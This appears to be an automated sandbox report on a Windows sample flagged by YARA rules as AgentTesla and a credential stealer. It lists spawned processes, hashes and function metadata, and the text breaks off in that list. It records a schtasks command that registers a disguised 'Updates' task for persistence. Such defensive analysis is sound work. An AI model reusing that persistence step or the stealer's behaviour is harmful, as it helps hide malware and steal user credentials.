                                                                                            Analysis Process: schtasks.exe PID: 6776 Parent PID: 6660

                                                                                            General

                                                                                            Start time:11:50:37
                                                                                            Start date:23/02/2021
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp'
                                                                                            Imagebase:0xbc0000
                                                                                            File size:185856 bytes
                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 6784 Parent PID: 6776

                                                                                            General

                                                                                            Start time:11:50:38
                                                                                            Start date:23/02/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff774ee0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: SecuriteInfo.com.Win32.18332.exe PID: 6828 Parent PID: 6660

                                                                                            General

                                                                                            Start time:11:50:38
                                                                                            Start date:23/02/2021
                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Imagebase:0x2d0000
                                                                                            File size:547328 bytes
                                                                                            MD5 hash:17BC24CEDB444E05E229B89CB01C2F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: SecuriteInfo.com.Win32.18332.exe PID: 6836 Parent PID: 6660

                                                                                            General

                                                                                            Start time:11:50:39
                                                                                            Start date:23/02/2021
                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Imagebase:0x2e0000
                                                                                            File size:547328 bytes
                                                                                            MD5 hash:17BC24CEDB444E05E229B89CB01C2F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: SecuriteInfo.com.Win32.18332.exe PID: 6844 Parent PID: 6660

                                                                                            General

                                                                                            Start time:11:50:39
                                                                                            Start date:23/02/2021
                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Imagebase:0xa40000
                                                                                            File size:547328 bytes
                                                                                            MD5 hash:17BC24CEDB444E05E229B89CB01C2F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Reset < >

                                                                                              Analysis Process: SecuriteInfo.com.Win32.18332.exe PID: 6660 Parent PID: 5748 SecuriteInfo.com.Win32.18332.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 058B5C78, Relevance: 2.6, Strings: 2, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%"l$$%"l
                                                                                              • API String ID: 0-1773605458
                                                                                              • Opcode ID: 31323961f8a1e4e715816ec816ef562ca2770b1c67d80c6af3099517e45214c9
                                                                                              • Instruction ID: fb899c95cd3aacbbbe2a8e81ec8a00615ec684a4148f6aa18bd31902b7876c7a
                                                                                              • Opcode Fuzzy Hash: 31323961f8a1e4e715816ec816ef562ca2770b1c67d80c6af3099517e45214c9
                                                                                              • Instruction Fuzzy Hash: FF3146B67002044FD710DB68D4989EABBFAEF85304B09C428D906CB751FBB1EC0A8B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320DB29, Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23b0c87af42f9b0064b638342096e338c74744669e4826d9bfed94b76a4f7af1
                                                                                              • Instruction ID: 0052e79576310afb46f31fc5c05818c83122a213462aef63f2d532b31bdd4ad9
                                                                                              • Opcode Fuzzy Hash: 23b0c87af42f9b0064b638342096e338c74744669e4826d9bfed94b76a4f7af1
                                                                                              • Instruction Fuzzy Hash: D9817F71C193889FCF12CFA5D8549DDBFB1BF4A304F19809AE408AB2A2D7359889DF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320BBC8, Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 669f091c6dfedf2bb48dcf58ec53a77d6599e27fdc17028a7e01ca0ace51c886
                                                                                              • Instruction ID: 49b8326f862f2ee6773a7b1f23afbeec3973b743903eb196d5ac5b0f7e010a67
                                                                                              • Opcode Fuzzy Hash: 669f091c6dfedf2bb48dcf58ec53a77d6599e27fdc17028a7e01ca0ace51c886
                                                                                              • Instruction Fuzzy Hash: DD714570A10B068FDB24CF2AD04475AB7F5FF88204F04892DD59ADBB81DB75E8898F91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320B214, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0320DD8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: eb01734709ae72cdd01107828024f0c16eeb2be511efa3e9f3b7aaec98f937bb
                                                                                              • Instruction ID: a2d0c4502613554b2fef723f36d16e004a09e64988e49263441998fc2ebe3668
                                                                                              • Opcode Fuzzy Hash: eb01734709ae72cdd01107828024f0c16eeb2be511efa3e9f3b7aaec98f937bb
                                                                                              • Instruction Fuzzy Hash: 2151DFB1D10309DFDB14CFAAC884ADEBBB5FF48314F24812AE819AB251D7749885CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320DC6D, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0320DD8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 955c0c2634c31d46643cec95ebf3fa06ed04479a171754d52acdaea971fe55da
                                                                                              • Instruction ID: ad58b4d8188bea397935d1e998098f5b66d9f232396a598bbe214d32252edbb7
                                                                                              • Opcode Fuzzy Hash: 955c0c2634c31d46643cec95ebf3fa06ed04479a171754d52acdaea971fe55da
                                                                                              • Instruction Fuzzy Hash: 0251E0B1C11349DFDB14CFAAC884ADEBBB1BF48314F24812AE819AB251D7749885CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BB440, Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (2&l
                                                                                              • API String ID: 0-3841443684
                                                                                              • Opcode ID: fe0a1f46c9a5f5642db95987971ef9e9982cfd490bc4822d453852487ca64e64
                                                                                              • Instruction ID: 5ed40f28ed5e33d754e967e933dcc03f0f9ba96c9f98b9013149c0cbe77ff100
                                                                                              • Opcode Fuzzy Hash: fe0a1f46c9a5f5642db95987971ef9e9982cfd490bc4822d453852487ca64e64
                                                                                              • Instruction Fuzzy Hash: BFE15D30B102058FDB04EF68E495AADBBB6FF89305F108468E906DB391DF799D45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 03205874, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ace28614302e2a0b6329b87b1a54acbd1bd28fce8239fb7326793a7a3c94589d
                                                                                              • Instruction ID: 3f902eaa777723ec0dc3295a7ab26bf1d112ec2b4e42ea23c19e4340463fbfa2
                                                                                              • Opcode Fuzzy Hash: ace28614302e2a0b6329b87b1a54acbd1bd28fce8239fb7326793a7a3c94589d
                                                                                              • Instruction Fuzzy Hash: 044193B181834C9FCB01CFA9D884ADEBFF4EF1A214F19449AE554E7292D3349984CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320DE81, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0320DEA8,?,?,?,?), ref: 0320DF1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 3e527dfad32133cbac765f2f91080aa3a297d5888286ee39906e364607d7aa76
                                                                                              • Instruction ID: fdebdf495d95e7aeefe80184808e7428a3d0268bad2ee9ee6c89650741005124
                                                                                              • Opcode Fuzzy Hash: 3e527dfad32133cbac765f2f91080aa3a297d5888286ee39906e364607d7aa76
                                                                                              • Instruction Fuzzy Hash: 632175B5801349DFCB11CFA8D988ADAFBF4EF48314F19845AE418A7252D334A948CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 03205864, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,03206D86,?,?,?,?,?), ref: 03206E47
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 1c22696e6b1e83bbd9581da7b5e431d981c8636bfe22d53956055f5aaf11cf0c
                                                                                              • Instruction ID: 9e47d031e71ab7f01a9425357981c2a9d24b74c315db63bdc9a530e105387763
                                                                                              • Opcode Fuzzy Hash: 1c22696e6b1e83bbd9581da7b5e431d981c8636bfe22d53956055f5aaf11cf0c
                                                                                              • Instruction Fuzzy Hash: A321E3B5900249DFDB10CFAAD984ADEBBF4FB48324F14842AE914A3351D378A954CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 03206DB9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,03206D86,?,?,?,?,?), ref: 03206E47
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: af64bca63671cd016d992e443976c04cfeb9d4397a9d07c85a43eda511c21a53
                                                                                              • Instruction ID: 070b38035a189693b4eba89478a1df7de506e5bb5bebda074b0ea27e5a4c726d
                                                                                              • Opcode Fuzzy Hash: af64bca63671cd016d992e443976c04cfeb9d4397a9d07c85a43eda511c21a53
                                                                                              • Instruction Fuzzy Hash: 2921E3B5900249AFDB10CFAAD984ADEFBF4EB48324F14841AE915B3350D378A954CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320B0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0320BE89,00000800,00000000,00000000), ref: 0320C09A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 990a7315024b7d4603fcdc03f159919a27ee63e180b42111c6d10a0af2886c64
                                                                                              • Instruction ID: 1dec86f36eda5e9106d62d2c803bd5f389d89d08c5d6b31aa54647dd50bc9d4c
                                                                                              • Opcode Fuzzy Hash: 990a7315024b7d4603fcdc03f159919a27ee63e180b42111c6d10a0af2886c64
                                                                                              • Instruction Fuzzy Hash: 1F1144B2C002198FCB10CF9AC988BDEFBF4EB48324F04852AE915A7240C375A548CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320C028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0320BE89,00000800,00000000,00000000), ref: 0320C09A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 95c74553e26906ddc6aa93fb3cff6e56e7aed375d5a84ba2a81106e465ff6f4f
                                                                                              • Instruction ID: e323eb08a8b43e98a507309a95a7dce94b1754562fcd71219e0fdabf2840463e
                                                                                              • Opcode Fuzzy Hash: 95c74553e26906ddc6aa93fb3cff6e56e7aed375d5a84ba2a81106e465ff6f4f
                                                                                              • Instruction Fuzzy Hash: 8F1144B2C002098FCB14CF9AC988BDEFBF4EB88314F15852AD515A7240C775A589CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320B080, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0320BBDB), ref: 0320BE0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 346c05b55d0e7bd90d7feee97163c98d0483b971917504d9adc16994cdecaaf4
                                                                                              • Instruction ID: a7223abd506db6e90bd4bb3d7d3d3405f14cd092a97b511827efa84d70893275
                                                                                              • Opcode Fuzzy Hash: 346c05b55d0e7bd90d7feee97163c98d0483b971917504d9adc16994cdecaaf4
                                                                                              • Instruction Fuzzy Hash: 291113B1C002498FCB20CF9AC448BDEFBF4EF88224F14846AD929A7341C374A585CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0320B24C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0320DEA8,?,?,?,?), ref: 0320DF1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 524e7dd9dd68737907615652e215fce1559b70aa330044187373186aef9d7ca4
                                                                                              • Instruction ID: a38970f0be802bc63b00f5e44f47147c5ce5d58078dda428ea6f07499e386ede
                                                                                              • Opcode Fuzzy Hash: 524e7dd9dd68737907615652e215fce1559b70aa330044187373186aef9d7ca4
                                                                                              • Instruction Fuzzy Hash: DD11F2B5800209DFDB10CF99D588BDEBBF8EB48324F10845AE915A7341C374A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BB432, Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (2&l
                                                                                              • API String ID: 0-3841443684
                                                                                              • Opcode ID: 6852833052827cf9093e11fb82c142a54b89518b4e56031807572e5add97683a
                                                                                              • Instruction ID: a2e73c69d086c2eb85488d880267917fef62f512999fb018d93d85e1385ccb2d
                                                                                              • Opcode Fuzzy Hash: 6852833052827cf9093e11fb82c142a54b89518b4e56031807572e5add97683a
                                                                                              • Instruction Fuzzy Hash: A3210131A202089BDB14EF75D455AAE7BBBFF85304B504428E802DB750DFB49D46CBC2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BFEE8, Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%"l
                                                                                              • API String ID: 0-3542353965
                                                                                              • Opcode ID: 19d210cb693e9e36da91e0fd7dd5cf8a0cab240e2c5284608810c553033912dc
                                                                                              • Instruction ID: b9bd5e03607b3aff6bae23f3aa94bbd2f766775fb191cbd66397252614ae25e0
                                                                                              • Opcode Fuzzy Hash: 19d210cb693e9e36da91e0fd7dd5cf8a0cab240e2c5284608810c553033912dc
                                                                                              • Instruction Fuzzy Hash: AF0162303042018FD714D719D854D66B3EAFF85215B15C479DA0AC7321DFB1EC01CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BB54F, Relevance: .3, Instructions: 288COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca727f57f555563f1d3dd37d61f3d59a8c9f266157d7e9029212619783646590
                                                                                              • Instruction ID: 702f59a2cb66f0d24675ed8cf7de970c3928b4be2eb4cf370c042ac57615b5f9
                                                                                              • Opcode Fuzzy Hash: ca727f57f555563f1d3dd37d61f3d59a8c9f266157d7e9029212619783646590
                                                                                              • Instruction Fuzzy Hash: 0AC14930B00204CFDB05EF68E495BADBBB6EF89309F1044A8D906DB391DB799D45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BDB50, Relevance: .2, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 695f640a57fd1e92911cb1d8bcc57a0b5694ccbfc0f0ec9dc4dcde328dcd54bf
                                                                                              • Instruction ID: 45c22dd2535643b421d9606ab6d3ad92b43c5b674bf66f012b7ed8318879616e
                                                                                              • Opcode Fuzzy Hash: 695f640a57fd1e92911cb1d8bcc57a0b5694ccbfc0f0ec9dc4dcde328dcd54bf
                                                                                              • Instruction Fuzzy Hash: F181F3387106149FDB14DF28D598EA97BF6FF88A05B1540A9E902CB372DBB1EC45CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058B5928, Relevance: .2, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c15a9b4105cc721f68aca3fdb32e83ebfc86d47584abe7be23119f9bc630838f
                                                                                              • Instruction ID: c5f3cfaf3580ef633f6d04c853d8df7291437999ed0bd904b70d44013c8c8198
                                                                                              • Opcode Fuzzy Hash: c15a9b4105cc721f68aca3fdb32e83ebfc86d47584abe7be23119f9bc630838f
                                                                                              • Instruction Fuzzy Hash: 64815BB0E003188FDB04DFA9C8946EEBBF6BF89304F14856AD805EB350EB749945CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BD640, Relevance: .2, Instructions: 200COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 92e1b7324ba8e1aab45e060e703b307b5557029db81c7f4d38d9f8a1b718d4be
                                                                                              • Instruction ID: 673a9a0db9b5d65f68050d252ad0d648dd633a9aab303eab7b1a67726ea20c67
                                                                                              • Opcode Fuzzy Hash: 92e1b7324ba8e1aab45e060e703b307b5557029db81c7f4d38d9f8a1b718d4be
                                                                                              • Instruction Fuzzy Hash: 86715D34B042088FCB15EBA4C8949ED77F2FF8D214B2544A9D946EB3A1CB75ED41CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BF5E0, Relevance: .2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a805c0435271f04d1e5645d41a6e5a6b22a82a6a956f91d2c874c0e7d95531a3
                                                                                              • Instruction ID: ee375b489c79213bda5f96ab4c18bdc09b0affa7d4276c12a910db6c66f50a70
                                                                                              • Opcode Fuzzy Hash: a805c0435271f04d1e5645d41a6e5a6b22a82a6a956f91d2c874c0e7d95531a3
                                                                                              • Instruction Fuzzy Hash: 49719F78A01248AFDB14DF69D884DAEBBB6FF49714F114098FA01AB361DB71EC81CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058B8598, Relevance: .2, Instructions: 166COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f3080c0bd51a38cb800cd40ebd47e9591d2982fc61790131622f622ba736acc8
                                                                                              • Instruction ID: e12ea2b753535b42d240dfb28930efd6523a74808ff2cc894697ffe069660c1e
                                                                                              • Opcode Fuzzy Hash: f3080c0bd51a38cb800cd40ebd47e9591d2982fc61790131622f622ba736acc8
                                                                                              • Instruction Fuzzy Hash: 7B519331A052098FEB24DB65C4506FEB3FEFF89214F14452ACA0AD7381DBB19D49CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058B8A90, Relevance: .2, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e2ff4dbf022f4cd41044b30fc27a939aa457fa7f9e55ed2665414b114fada6c
                                                                                              • Instruction ID: 7223586482329614fedd782b2ddba442e89720d50ac66763393011e2a1df23da
                                                                                              • Opcode Fuzzy Hash: 1e2ff4dbf022f4cd41044b30fc27a939aa457fa7f9e55ed2665414b114fada6c
                                                                                              • Instruction Fuzzy Hash: BA51A2B0614B058BF774CE38C496BA6B7FAFB49304F144E29E4A6CB750D7B4E8458B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BDFE8, Relevance: .2, Instructions: 156COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e27cf16d09ddcab9f2210bac1c0a68d9d2f57d90edad113de45ffa4fcdc21c03
                                                                                              • Instruction ID: d4806a01bcac8bf2125bce16a110c256d5c9526492679fbbb2b9c04d62243baf
                                                                                              • Opcode Fuzzy Hash: e27cf16d09ddcab9f2210bac1c0a68d9d2f57d90edad113de45ffa4fcdc21c03
                                                                                              • Instruction Fuzzy Hash: F9518D32A015099FDF10DFA4D8849EEB7BAFF85310F558066ED05EB261DB75E90ACB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058B4CF8, Relevance: .2, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5c02ad43d5349563e5a239695e113a624e6f01a8f67dea9953123600d06fcc6
                                                                                              • Instruction ID: f0c9244c799138a42bc9b3dc60435f2cdae4f92134606fa5a251da40641b18cc
                                                                                              • Opcode Fuzzy Hash: b5c02ad43d5349563e5a239695e113a624e6f01a8f67dea9953123600d06fcc6
                                                                                              • Instruction Fuzzy Hash: D6515271E003059FDB14DFA9C848AEFBBF9EF88314F14842AE955E7350EB7499058BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058B7ED8, Relevance: .1, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4709152a974d9ffeb50afdc4efe4d31d2696e687edab5d144a140b6802ff769f
                                                                                              • Instruction ID: 382520a49c986e3303077930f8f8976f73930a6aedab983a4ab37bec4d24ec8f
                                                                                              • Opcode Fuzzy Hash: 4709152a974d9ffeb50afdc4efe4d31d2696e687edab5d144a140b6802ff769f
